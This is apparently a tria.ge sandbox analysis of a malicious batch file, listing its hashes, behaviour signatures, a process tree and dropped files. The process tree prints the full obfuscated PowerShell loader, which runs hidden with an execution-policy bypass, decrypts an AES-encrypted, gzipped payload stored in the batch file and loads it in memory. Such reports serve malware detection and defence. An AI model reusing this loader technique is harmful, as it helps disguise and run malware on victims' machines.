Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08/01/2024, 20:50
Static task
static1
Behavioral task
behavioral1
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win10v2004-20231215-en
General
-
Target
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
-
Size
1.6MB
-
MD5
4fbb5e9e5b5690f1b361f9f67d10e25c
-
SHA1
b77eeb5b8b08f5dfa427cd078423e4f190a28c41
-
SHA256
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3
-
SHA512
640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770
-
SSDEEP
24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3032 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 2248 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2248 wrote to memory of 3032 2248 cmd.exe 19 PID 2248 wrote to memory of 3032 2248 cmd.exe 19 PID 2248 wrote to memory of 3032 2248 cmd.exe 19
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
PID:3032
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize7KB
MD51a55940ea67fa5fc262a46a272504c58
SHA16f000a45239b343de83ce80f9a3ad0970e9ca010
SHA2560f92483bb3e37523ffb9dd2e62e43974306b66d21ddf9b70c4e8c98f93746e91
SHA512b30f6327104ad5e65f6f6d8b3ac41b927a60a550feb7b8815a6dbc8b46cc2b99519a06f3ba78a9460be8d7ade82b1cde0c3a7e41d2deee91fc6175fc9f7ad639
-
\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize18KB
MD5055e9ad68a7ed922ac8b376c96270622
SHA1bf15d9df06764e9045c65f7136c9b1dbae9e36c4
SHA25657f286509d4a5a66f9d77d54360e6caa39241af533b51f731f7285274877b95a
SHA512841613348027c97221d975f3d62a31ced41ebc96333eee2cefed8c00704975418ef739aeeec9762290236de48f0226ef03a43d3af4e2c4e561fc703684423435